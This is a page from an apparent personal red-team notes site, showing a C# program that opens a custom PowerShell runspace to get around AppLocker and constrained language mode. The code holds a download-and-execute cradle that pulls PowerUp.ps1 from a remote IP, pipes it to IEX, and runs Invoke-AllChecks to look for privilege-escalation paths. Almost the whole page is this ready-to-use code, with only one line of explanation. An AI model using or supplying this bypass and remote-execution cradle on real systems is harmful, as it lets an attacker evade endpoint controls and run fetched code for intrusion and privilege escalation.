😎
Intruder
😎
Intruder
Twitter
About Shantanu Khandelwal
Reporting
Excel Sheet to Word Report by PowerShell
Ghostwriter - Add report type
Red Team
Domain Front
GoLang
ShellCode Injection
PowerShell
Enable Restricted Admin using powershell and use mimikatz for RDP
Powershell Custom Runspace
Using Reflection for AMSI Bypass
Database
Dealing with the Errors
Setting Up OPENVAS in KALI 2020.3
Phishing
Connecting GoPhish with Office365
SharpLoginPrompt - Success and a Curious Case
Talks I Like
Talks Worth Checking Out
Powered by GitBook

Powershell Custom Runspace

Powershell runspace allows ways to run powershell in an applocker mode or where powershell is in constrained language mode. 

using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace Bypass
{
    class Program
    {
        static void Main(string[] args)
        {
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Tools\\test.txt";
            cmd = "(New-Object System.Net.WebClient).DownloadString('http://192.168.49.95/PowerUp.ps1') | IEX; Invoke-AllChecks | Out-File -FilePath C:\\Tools\\test.txt";
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
​
        }
    }
}
Previous
Enable Restricted Admin using powershell and use mimikatz for RDP
Next
Using Reflection for AMSI Bypass
Last updated 6 months ago